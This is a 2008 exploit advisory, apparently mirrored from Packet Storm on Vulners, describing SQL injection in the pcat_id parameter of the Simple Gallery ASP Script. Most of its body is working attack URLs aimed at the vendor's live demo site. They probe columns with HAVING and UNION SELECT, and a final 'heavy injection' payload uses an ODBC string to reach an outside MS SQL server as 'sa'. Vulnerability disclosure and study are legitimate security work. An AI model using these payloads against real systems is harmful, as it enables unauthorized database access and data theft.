Lucene search
K

simpgal-sql.txt

🗓️ 27 Aug 2008 00:00:00Reported by e.wiZz!Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Simple Gallery ASP Script SQL Injection Vulnerability on preprojects.com, tutorial available

Code
`#################Simple gallery (pcat_id) SQL Injection Vulnerability#########################  
  
  
#######By: e.wiZz! [email protected]  
#####Info: Bosnian Idiot FTW!  
#####Site: infected.blogger.ba  
#####Greetz: Luigi Auriemma,str0ke   
  
In the wild....  
######################################################################################  
  
#####Project Name: Simple Gallery ASP Script  
#####Site: preprojects.com  
#####Vulnerability: SQL Injection  
  
#####PoC on demo site :  
http://www.preprojects.com/pgallery/gallery/  
  
Ok,we have table "admin",but we need to find how many columns is there,to extract somethin' ....but we need to know at least one column to start....lets find one :)  
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 HAVING sum('inthewild')='inthewild'  
  
we got photo_id ....lets find how many columns is there:  
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id from admin  
  
we got error: The number of columns in the two selected tables or queries of a union query do not match. Try something else...  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 union select photo_id,null,null,null,null,null,null,null,null from admin  
  
response: No value given for one or more required parameters. ......so its 9 columns...i wont continue with it.  
  
  
  
Connect to a network accessible MS SQL instance (heavy injection :)   
  
http://www.preprojects.com/pgallery/gallery/category_photos.asp?p=1&pcat_id=22 UNION SELECT *  
FROM [ODBC;DRIVER=SQL SERVER;Server=<serverinthewild>,<Port>;UID=sa;PWD=<PASSWORD>;  
DATABASE=master].Information_Schema.Tables where '1'='1'or'bosnian'='idiot'  
  
  
Almost tutorial :)`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Aug 2008 00:00Current
7.4High risk
Vulners AI Score7.4
30